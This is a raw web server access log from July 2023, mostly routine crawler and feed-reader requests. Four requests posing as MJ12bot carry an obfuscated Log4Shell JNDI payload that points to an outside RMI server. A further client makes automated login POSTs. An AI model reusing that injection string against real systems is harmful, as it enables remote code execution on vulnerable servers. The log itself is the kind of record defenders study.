65.108.78.33 - - [03/Jul/2023:04:06:19 +0200] "GET /node/976?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:06:30 +0200] "GET /node/976?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:06:41 +0200] "GET /node/979 HTTP/1.1" 200 8748 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:06:52 +0200] "GET /node/979?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:07:03 +0200] "GET /node/980 HTTP/1.1" 200 7172 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:07:13 +0200] "GET /node/980?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:07:24 +0200] "GET /node/980?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:07:35 +0200] "GET /node/981 HTTP/1.1" 200 5707 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:07:46 +0200] "GET /node/981?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:07:51 +0200] "GET /robots.txt HTTP/1.1" 200 1590 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.232 - - [03/Jul/2023:04:07:51 +0200] "GET /robots.txt HTTP/1.1" 200 1590 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:07:57 +0200] "GET /node/982 HTTP/1.1" 200 8448 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:08:07 +0200] "GET /node/982?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:08:18 +0200] "GET /node/983 HTTP/1.1" 200 10512 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:08:29 +0200] "GET /node/983?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:08:39 +0200] "GET /node/984 HTTP/1.1" 200 7513 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:08:50 +0200] "GET /node/984?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:09:01 +0200] "GET /node/986 HTTP/1.1" 200 5958 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:09:12 +0200] "GET /node/986?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:09:23 +0200] "GET /node/988 HTTP/1.1" 200 6124 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:09:33 +0200] "GET /node/988?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:09:44 +0200] "GET /node/990 HTTP/1.1" 200 8771 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:09:55 +0200] "GET /node/990?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:10:06 +0200] "GET /node/992 HTTP/1.1" 200 7361 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:10:16 +0200] "GET /node/992?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:10:27 +0200] "GET /node/992?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:10:38 +0200] "GET /node/993?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:10:49 +0200] "GET /node/994 HTTP/1.1" 200 6667 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:11:00 +0200] "GET /node/994?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:11:10 +0200] "GET /node/994?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:11:21 +0200] "GET /node/995 HTTP/1.1" 200 7815 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:11:32 +0200] "GET /node/995?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:11:42 +0200] "GET /node/995?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:11:45 +0200] "GET /eventscalendar/2023-W04 HTTP/1.1" 200 7737 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:11:53 +0200] "GET /node/996 HTTP/1.1" 200 10770 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:11:56 +0200] "GET /eventscalendar/2022-01-07 HTTP/1.1" 200 5791 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:12:04 +0200] "GET /node/996?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.102.6.34 - - [03/Jul/2023:04:12:04 +0200] "GET /blog/3/feed HTTP/1.1" 200 2701 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
216.244.66.232 - - [03/Jul/2023:04:12:09 +0200] "GET /eventscalendar/2022-01-02 HTTP/1.1" 200 5791 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:12:15 +0200] "GET /node/996?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:12:20 +0200] "GET /eventscalendar/2022-05-13 HTTP/1.1" 200 5788 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:12:26 +0200] "GET /node/997 HTTP/1.1" 200 6721 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:12:36 +0200] "GET /node/997?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:12:47 +0200] "GET /node/997?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.36.149.34 - - [03/Jul/2023:04:12:47 +0200] "GET /node/800?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
40.77.167.169 - - [03/Jul/2023:04:12:50 +0200] "GET /node/877 HTTP/1.1" 200 5665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
65.108.78.33 - - [03/Jul/2023:04:12:58 +0200] "GET /node/998 HTTP/1.1" 200 7552 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:13:09 +0200] "GET /node/998?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:13:20 +0200] "GET /node/998?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:13:31 +0200] "GET /node?page=1&$%7B$%7B::-j%7Dndi:rmi:/%252F188_166_57_35:1389/Binary%7D= HTTP/1.1" 200 18440 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:13:42 +0200] "GET /node?page=2&$%7B$%7B::-j%7Dndi:rmi:/%252F188_166_57_35:1389/Binary%7D= HTTP/1.1" 200 19269 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:13:54 +0200] "GET /node?page=3&$%7B$%7B::-j%7Dndi:rmi:/%252F188_166_57_35:1389/Binary%7D= HTTP/1.1" 200 17713 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:14:01 +0200] "GET /node/1140 HTTP/1.1" 200 11840 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:14:04 +0200] "GET /node?page=4&$%7B$%7B::-j%7Dndi:rmi:/%252F188_166_57_35:1389/Binary%7D= HTTP/1.1" 200 7733 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:14:15 +0200] "GET /positiveblog?page=10 HTTP/1.1" 200 14903 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:14:26 +0200] "GET /positiveblog?page=11 HTTP/1.1" 200 14804 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:14:35 +0200] "GET /eventscalendar/2020-W47 HTTP/1.1" 200 7740 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:14:37 +0200] "GET /positiveblog?page=12 HTTP/1.1" 200 15087 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:14:48 +0200] "GET /positiveblog?page=13 HTTP/1.1" 200 14194 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:14:59 +0200] "GET /positiveblog?page=14 HTTP/1.1" 200 14093 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:15:10 +0200] "GET /positiveblog?page=15 HTTP/1.1" 200 14634 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:15:21 +0200] "GET /positiveblog?page=16 HTTP/1.1" 200 15021 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:15:32 +0200] "GET /positiveblog?page=17 HTTP/1.1" 200 15074 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:15:43 +0200] "GET /positiveblog?page=18 HTTP/1.1" 200 14855 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:15:52 +0200] "GET /eventscalendar/2021-01-27 HTTP/1.1" 200 5795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:15:54 +0200] "GET /positiveblog?page=19 HTTP/1.1" 200 14964 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:16:04 +0200] "GET /positiveblog?page=20 HTTP/1.1" 200 15048 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:16:15 +0200] "GET /eventscalendar/2026-09-08 HTTP/1.1" 200 5794 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:16:15 +0200] "GET /positiveblog?page=21 HTTP/1.1" 200 15087 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:16:26 +0200] "GET /positiveblog?page=22 HTTP/1.1" 200 15208 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:16:37 +0200] "GET /positiveblog?page=23 HTTP/1.1" 200 15066 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
49.12.13.109 - - [03/Jul/2023:04:16:43 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
65.108.78.33 - - [03/Jul/2023:04:16:48 +0200] "GET /positiveblog?page=24 HTTP/1.1" 200 15155 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:16:59 +0200] "GET /positiveblog?page=25 HTTP/1.1" 200 15305 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.56.55.225 - - [03/Jul/2023:04:17:02 +0200] "GET /cron.php HTTP/1.0" 200 0 "-" "Wget/1.10.2"
65.108.78.33 - - [03/Jul/2023:04:17:10 +0200] "GET /positiveblog?page=26 HTTP/1.1" 200 15085 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:17:20 +0200] "GET /positiveblog?page=27 HTTP/1.1" 200 15107 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:17:31 +0200] "GET /positiveblog?page=28 HTTP/1.1" 200 15126 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:17:42 +0200] "GET /positiveblog?page=29 HTTP/1.1" 200 15220 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:17:53 +0200] "GET /positiveblog?page=30 HTTP/1.1" 200 15030 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:18:04 +0200] "GET /positiveblog?page=31 HTTP/1.1" 200 14598 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:18:12 +0200] "GET /node/416 HTTP/1.1" 200 7643 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:18:16 +0200] "GET /positiveblog?page=32 HTTP/1.1" 200 14900 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:18:23 +0200] "GET /node/508 HTTP/1.1" 200 6083 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:18:27 +0200] "GET /positiveblog?page=33 HTTP/1.1" 200 15210 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.244.66.232 - - [03/Jul/2023:04:18:34 +0200] "GET /node/794 HTTP/1.1" 200 7155 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
65.108.78.33 - - [03/Jul/2023:04:18:37 +0200] "GET /positiveblog?page=34 HTTP/1.1" 200 14989 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:18:48 +0200] "GET /positiveblog?page=35 HTTP/1.1" 200 15271 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:18:59 +0200] "GET /positiveblog?page=36 HTTP/1.1" 200 15202 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:19:11 +0200] "GET /positiveblog?page=37 HTTP/1.1" 200 15522 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:19:21 +0200] "GET /positiveblog?page=38 HTTP/1.1" 200 14425 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:19:32 +0200] "GET /positiveblog?page=39 HTTP/1.1" 200 14884 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:19:42 +0200] "GET /positiveblog?page=40 HTTP/1.1" 200 15420 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:19:54 +0200] "GET /positiveblog?page=41 HTTP/1.1" 200 14461 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:20:05 +0200] "GET /positiveblog?page=42 HTTP/1.1" 200 15136 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:20:16 +0200] "GET /positiveblog?page=43 HTTP/1.1" 200 14546 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:20:27 +0200] "GET /positiveblog?page=44 HTTP/1.1" 200 15232 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:20:38 +0200] "GET /positiveblog?page=45 HTTP/1.1" 200 15208 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:20:49 +0200] "GET /positiveblog?page=46 HTTP/1.1" 200 15191 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.167.144.61 - - [03/Jul/2023:04:20:59 +0200] "GET /eventscalendar/2020-06-05 HTTP/1.1" 200 5788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
65.108.78.33 - - [03/Jul/2023:04:21:00 +0200] "GET /positiveblog?page=47 HTTP/1.1" 200 14462 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:21:11 +0200] "GET /positiveblog?page=48 HTTP/1.1" 200 14928 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:21:22 +0200] "GET /positiveblog?page=49 HTTP/1.1" 200 15073 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:21:33 +0200] "GET /positiveblog?page=50 HTTP/1.1" 200 14204 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:21:43 +0200] "GET /positiveblog?page=52 HTTP/1.1" 200 14571 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:21:54 +0200] "GET /positiveblog?page=53 HTTP/1.1" 200 15198 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:22:05 +0200] "GET /positiveblog?page=54 HTTP/1.1" 200 14637 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:22:16 +0200] "GET /positiveblog?page=55 HTTP/1.1" 200 14928 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:22:27 +0200] "GET /positiveblog?page=56 HTTP/1.1" 200 14333 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:22:38 +0200] "GET /positiveblog?page=57 HTTP/1.1" 200 13487 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:22:49 +0200] "GET /positiveblog?page=58 HTTP/1.1" 200 14140 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:23:00 +0200] "GET /positiveblog?page=59 HTTP/1.1" 200 16181 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:23:11 +0200] "GET /positiveblog?page=60 HTTP/1.1" 200 15231 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:23:22 +0200] "GET /positiveblog?page=61 HTTP/1.1" 200 15572 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:23:33 +0200] "GET /positiveblog?page=62 HTTP/1.1" 200 16052 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:23:44 +0200] "GET /positiveblog?page=63 HTTP/1.1" 200 16050 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:23:55 +0200] "GET /positiveblog?page=9 HTTP/1.1" 200 14930 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:24:06 +0200] "GET /rss.xml HTTP/1.1" 200 14317 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:24:07 +0200] "GET /robots.txt HTTP/1.1" 200 1590 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:24:18 +0200] "GET /blog/3/feed HTTP/1.1" 200 11638 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:24:28 +0200] "GET /eventscalendar/2016-10-12?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:24:39 +0200] "GET /eventscalendar/2016-10-15?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:24:50 +0200] "GET /eventscalendar/2016-10-19?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:25:00 +0200] "GET /eventscalendar/2016-10-24?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:25:11 +0200] "GET /eventscalendar/2016-11-01?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:25:22 +0200] "GET /eventscalendar/2016-W43?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:25:32 +0200] "GET /eventscalendar/2017-03-20?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.102.6.33 - - [03/Jul/2023:04:25:34 +0200] "GET /blog/3/feed HTTP/1.1" 200 2701 "-" "FeedBurner/1.0 (http://www.FeedBurner.com)"
65.108.78.33 - - [03/Jul/2023:04:25:43 +0200] "GET /eventscalendar/2017-03-21?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
164.68.96.104 - - [03/Jul/2023:04:25:48 +0200] "GET /?q=node/add HTTP/1.1" 200 4284 "http://www.treehugger.hu/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
164.68.96.104 - - [03/Jul/2023:04:25:49 +0200] "GET /?q=user HTTP/1.1" 200 5465 "http://www.treehugger.hu/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
164.68.96.104 - - [03/Jul/2023:04:25:49 +0200] "POST /?q=user HTTP/1.1" 200 5488 "http://www.treehugger.hu/?q=user" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
164.68.96.104 - - [03/Jul/2023:04:25:49 +0200] "POST /?q=user HTTP/1.1" 200 5488 "http://www.treehugger.hu/?q=user" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
164.68.96.104 - - [03/Jul/2023:04:25:49 +0200] "GET /?q=node/add HTTP/1.1" 200 1581 "http://www.treehugger.hu/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
164.68.96.104 - - [03/Jul/2023:04:25:49 +0200] "GET /positiveblog HTTP/1.1" 200 15052 "http://www.treehugger.hu/?q=node/add" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
164.68.96.104 - - [03/Jul/2023:04:25:50 +0200] "GET /?q=user HTTP/1.1" 200 1974 "http://www.treehugger.hu/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
